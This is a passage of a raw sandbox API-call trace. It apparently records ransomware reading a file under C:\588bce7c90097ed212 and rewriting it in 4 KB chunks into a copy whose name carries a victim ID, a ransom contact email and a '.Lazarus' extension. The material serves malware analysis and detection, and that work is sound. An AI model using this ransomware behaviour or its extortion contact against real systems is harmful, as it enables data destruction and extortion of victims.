lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0074.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0074.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0074.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0074.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0074.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0074.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0074.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0074.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0074.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0074.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0074.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0074.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0074.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0074.118] AreFileApisANSI () returned 1 [0074.118] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x538c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 49 [0074.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x62) returned 0x469e8 [0074.118] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x538c8, cbMultiByte=-1, lpWideCharStr=0x469e8, cchWideChar=49 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml") returned 49 [0074.118] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml" (normalized: "c:\\588bce7c90097ed212\\extended\\parameterinfo.xml"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x2a714f00, ftCreationTime.dwHighDateTime=0x1cac6f0, ftLastAccessTime.dwLowDateTime=0x2a714f00, ftLastAccessTime.dwHighDateTime=0x1cac6f0, ftLastWriteTime.dwLowDateTime=0x2a714f00, ftLastWriteTime.dwHighDateTime=0x1cac6f0, nFileSizeHigh=0x0, nFileSizeLow=0x16c82)) returned 1 [0074.119] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x469e8 | out: hHeap=0x20000) returned 1 [0074.119] AreFileApisANSI () returned 1 [0074.119] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0074.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0074.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0074.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0074.119] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0074.119] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0074.119] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0074.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0074.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0074.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0074.119] GetLastError () returned 0x0 [0074.119] SetLastError (dwErrCode=0x0) [0074.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e110 [0074.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x85fc0 [0074.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b680 [0074.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d4c8 [0074.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d4e0 [0074.119] GetLastError () returned 0x0 [0074.119] SetLastError (dwErrCode=0x0) [0074.119] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0074.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0074.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5f) returned 0x71b00 [0074.119] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0074.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a660 [0074.119] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0074.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0074.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0074.120] AreFileApisANSI () returned 1 [0074.120] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8a660, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 111 [0074.120] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xde) returned 0x5a6b8 [0074.120] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8a660, cbMultiByte=-1, lpWideCharStr=0x5a6b8, cchWideChar=111 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 111 [0074.120] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\extended\\parameterinfo.xml.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0074.149] GetFileType (hFile=0x410) returned 0x1 [0074.149] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0074.149] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0074.150] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0074.150] AreFileApisANSI () returned 1 [0074.150] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 49 [0074.150] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x62) returned 0x46278 [0074.150] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x46278, cchWideChar=49 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml") returned 49 [0074.150] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml" (normalized: "c:\\588bce7c90097ed212\\extended\\parameterinfo.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0074.150] GetFileType (hFile=0x42c) returned 0x1 [0074.150] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46278 | out: hHeap=0x20000) returned 1 [0074.150] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x69db0 [0074.150] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0074.150] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0074.150] GetLastError () returned 0x0 [0074.150] SetLastError (dwErrCode=0x0) [0074.150] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0074.150] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0074.150] GetLastError () returned 0x0 [0074.150] SetLastError (dwErrCode=0x0) [0074.150] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0074.150] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0074.150] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0074.151] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0074.189] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0074.189] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d5d0 [0074.189] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x91458 [0074.190] GetLastError () returned 0x0 [0074.190] SetLastError (dwErrCode=0x0) [0074.190] GetLastError () returned 0x0 [0074.190] SetLastError (dwErrCode=0x0) [0074.190] GetLastError () returned 0x0 [0074.190] SetLastError (dwErrCode=0x0) [0074.190] GetLastError () returned 0x0 [0074.190] SetLastError (dwErrCode=0x0) [0074.190] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0074.191] WriteFile (in: hFile=0x410, lpBuffer=0x91458*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x91458*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0074.192] GetLastError () returned 0x0 [0074.192] SetLastError (dwErrCode=0x0) [0074.192] GetLastError () returned 0x0 [0074.192] SetLastError (dwErrCode=0x0) [0074.192] GetLastError () returned 0x0 [0074.192] SetLastError (dwErrCode=0x0) [0074.192] GetLastError () returned 0x0 [0074.192] SetLastError (dwErrCode=0x0) [0074.192] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0074.192] WriteFile (in: hFile=0x410, lpBuffer=0x91458*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x91458*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0074.192] GetLastError () returned 0x0 [0074.192] SetLastError (dwErrCode=0x0) [0074.193] GetLastError () returned 0x0 [0074.193] SetLastError (dwErrCode=0x0) [0074.193] GetLastError () returned 0x0 [0074.193] SetLastError (dwErrCode=0x0) [0074.193] GetLastError () returned 0x0 [0074.193] SetLastError (dwErrCode=0x0) [0074.193] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0074.193] WriteFile (in: hFile=0x410, lpBuffer=0x91458*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x91458*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0074.193] GetLastError () returned 0x0 [0074.193] SetLastError (dwErrCode=0x0) [0074.193] GetLastError () returned 0x0 [0074.194] SetLastError (dwErrCode=0x0) [0074.194] GetLastError () returned 0x0 [0074.194] SetLastError (dwErrCode=0x0) [0074.194] GetLastError () returned 0x0 [0074.194] SetLastError (dwErrCode=0x0) [0074.194] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0074.194] WriteFile (in: hFile=0x410, lpBuffer=0x91458*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x91458*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0074.194] GetLastError () returned 0x0 [0074.194] SetLastError (dwErrCode=0x0) [0074.194] GetLastError () returned 0x0 [0074.194] SetLastError (dwErrCode=0x0) [0074.194] GetLastError () returned 0x0 [0074.194] SetLastError (dwErrCode=0x0) [0074.195] GetLastError () returned 0x0 [0074.195] SetLastError (dwErrCode=0x0) [0074.195] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0074.195] WriteFile (in: hFile=0x410, lpBuffer=0x91458*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x91458*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0074.195] GetLastError () returned 0x0 [0074.195] SetLastError (dwErrCode=0x0) [0074.195] GetLastError () returned 0x0 [0074.195] SetLastError (dwErrCode=0x0) [0074.195] GetLastError () returned 0x0 [0074.195] SetLastError (dwErrCode=0x0) [0074.196] GetLastError () returned 0x0 [0074.196] SetLastError (dwErrCode=0x0) [0074.196] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0074.196] WriteFile (in: hFile=0x410, lpBuffer=0x91458*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x91458*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0074.196] GetLastError () returned 0x0 [0074.196] SetLastError (dwErrCode=0x0) [0074.196] GetLastError () returned 0x0 [0074.196] SetLastError (dwErrCode=0x0) [0074.196] GetLastError () returned 0x0 [0074.196] SetLastError (dwErrCode=0x0) [0074.196] GetLastError () returned 0x0 [0074.196] SetLastError (dwErrCode=0x0) [0074.197] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0074.197] WriteFile (in: hFile=0x410, lpBuffer=0x91458*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x91458*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0074.197] GetLastError () returned 0x0 [0074.197] SetLastError (dwErrCode=0x0) [0074.197] GetLastError () returned 0x0 [0074.197] SetLastError (dwErrCode=0x0) [0074.197] GetLastError () returned 0x0 [0074.197] SetLastError (dwErrCode=0x0) [0074.197] GetLastError () returned 0x0 [0074.197] SetLastError (dwErrCode=0x0) [0074.197] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0074.198] WriteFile (in: hFile=0x410, lpBuffer=0x91458*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x91458*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0074.198] GetLastError () returned 0x0 [0074.198] SetLastError (dwErrCode=0x0) [0074.198] GetLastError () returned 0x0 [0074.198] SetLastError (dwErrCode=0x0) [0074.198] GetLastError () returned 0x0 [0074.198] SetLastError (dwErrCode=0x0) [0074.198] GetLastError () returned 0x0 [0074.198] SetLastError (dwErrCode=0x0) [0074.198] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0074.198] WriteFile (in: hFile=0x410, lpBuffer=0x91458*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x91458*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0074.199] GetLastError () returned 0x0 [0074.199] SetLastError (dwErrCode=0x0) [0074.199] GetLastError () returned 0x0 [0074.199] SetLastError (dwErrCode=0x0) [0074.199] GetLastError () returned 0x0 [0074.199] SetLastError (dwErrCode=0x0) [0074.199] GetLastError () returned 0x0 [0074.199] SetLastError (dwErrCode=0x0) [0074.199] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0074.199] WriteFile (in: hFile=0x410, lpBuffer=0x91458*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x91458*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0074.199] GetLastError () returned 0x0 [0074.199] SetLastError (dwErrCode=0x0) [0074.199] GetLastError () returned 0x0 [0074.199] SetLastError (dwErrCode=0x0) [0074.200] GetLastError () returned 0x0 [0074.200] SetLastError (dwErrCode=0x0) [0074.200] GetLastError () returned 0x0 [0074.200] SetLastError (dwErrCode=0x0) [0074.200] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0074.200] WriteFile (in: hFile=0x410, lpBuffer=0x91458*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x91458*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0074.200] GetLastError () returned 0x0 [0074.200] SetLastError (dwErrCode=0x0) [0074.200] GetLastError () returned 0x0 [0074.200] SetLastError (dwErrCode=0x0) [0074.200] GetLastError () returned 0x0 [0074.200] SetLastError (dwErrCode=0x0) [0074.201] GetLastError () returned 0x0 [0074.201] SetLastError (dwErrCode=0x0) [0074.201] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0074.201] WriteFile (in: hFile=0x410, lpBuffer=0x91458*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x91458*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0074.201] GetLastError () returned 0x0 [0074.201] SetLastError (dwErrCode=0x0) [0074.201] GetLastError () returned 0x0 [0074.201] SetLastError (dwErrCode=0x0) [0074.201] GetLastError () returned 0x0 [0074.201] SetLastError (dwErrCode=0x0) [0074.201] GetLastError () returned 0x0 [0074.201] SetLastError (dwErrCode=0x0) [0074.202] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0074.202] WriteFile (in: hFile=0x410, lpBuffer=0x91458*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x91458*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0074.202] GetLastError () returned 0x0 [0074.202] SetLastError (dwErrCode=0x0) [0074.202] GetLastError () returned 0x0 [0074.202] SetLastError (dwErrCode=0x0) [0074.202] GetLastError () returned 0x0 [0074.202] SetLastError (dwErrCode=0x0) [0074.202] GetLastError () returned 0x0 [0074.202] SetLastError (dwErrCode=0x0) [0074.202] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0074.203] WriteFile (in: hFile=0x410, lpBuffer=0x91458*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x91458*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0074.203] GetLastError () returned 0x0 [0074.203] SetLastError (dwErrCode=0x0) [0074.203] GetLastError () returned 0x0 [0074.203] SetLastError (dwErrCode=0x0) [0074.203] GetLastError () returned 0x0 [0074.203] SetLastError (dwErrCode=0x0) [0074.203] GetLastError () returned 0x0 [0074.203] SetLastError (dwErrCode=0x0) [0074.203] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0074.203] WriteFile (in: hFile=0x410, lpBuffer=0x91458*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x91458*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0074.204] GetLastError () returned 0x0 [0074.204] SetLastError (dwErrCode=0x0) [0074.204] GetLastError () returned 0x0 [0074.204] SetLastError (dwErrCode=0x0) [0074.204] GetLastError () returned 0x0 [0074.204] SetLastError (dwErrCode=0x0) [0074.204] GetLastError () returned 0x0 [0074.204] SetLastError (dwErrCode=0x0) [0074.204] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0074.204] WriteFile (in: hFile=0x410, lpBuffer=0x91458*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x91458*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0074.204] GetLastError () returned 0x0 [0074.205] SetLastError (dwErrCode=0x0) [0074.205] GetLastError () returned 0x0 [0074.205] SetLastError (dwErrCode=0x0) [0074.205] GetLastError () returned 0x0 [0074.205] SetLastError (dwErrCode=0x0) [0074.205] GetLastError () returned 0x0 [0074.205] SetLastError (dwErrCode=0x0) [0074.205] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0074.205] WriteFile (in: hFile=0x410, lpBuffer=0x91458*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x91458*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0074.205] GetLastError () returned 0x0 [0074.205] SetLastError (dwErrCode=0x0) [0074.205] GetLastError () returned 0x0 [0074.205] SetLastError (dwErrCode=0x0) [0074.206] GetLastError () returned 0x0 [0074.206] SetLastError (dwErrCode=0x0) [0074.206] GetLastError () returned 0x0 [0074.206] SetLastError (dwErrCode=0x0) [0074.206] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0074.206] WriteFile (in: hFile=0x410, lpBuffer=0x91458*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x91458*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0074.206] GetLastError () returned 0x0 [0074.206] SetLastError (dwErrCode=0x0) [0074.206] GetLastError () returned 0x0 [0074.206] SetLastError (dwErrCode=0x0) [0074.206] GetLastError () returned 0x0 [0074.206] SetLastError (dwErrCode=0x0) [0074.207] GetLastError () returned 0x0 [0074.207] SetLastError (dwErrCode=0x0) [0074.207] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0074.207] WriteFile (in: hFile=0x410, lpBuffer=0x91458*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x91458*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0074.207] GetLastError () returned 0x0 [0074.207] SetLastError (dwErrCode=0x0) [0074.207] GetLastError () returned 0x0 [0074.207] SetLastError (dwErrCode=0x0) [0074.207] GetLastError () returned 0x0 [0074.207] SetLastError (dwErrCode=0x0) [0074.207] GetLastError () returned 0x0 [0074.207] SetLastError (dwErrCode=0x0) [0074.208] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0074.208] WriteFile (in: hFile=0x410, lpBuffer=0x91458*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x91458*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0074.208] GetLastError () returned 0x0 [0074.208] SetLastError (dwErrCode=0x0) [0074.208] GetLastError () returned 0x0 [0074.208] SetLastError (dwErrCode=0x0) [0074.208] GetLastError () returned 0x0 [0074.208] SetLastError (dwErrCode=0x0) [0074.208] GetLastError () returned 0x0 [0074.208] SetLastError (dwErrCode=0x0) [0074.208] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0074.209] WriteFile (in: hFile=0x410, lpBuffer=0x91458*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x91458*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0074.209] GetLastError () returned 0x0 [0074.209] SetLastError (dwErrCode=0x0) 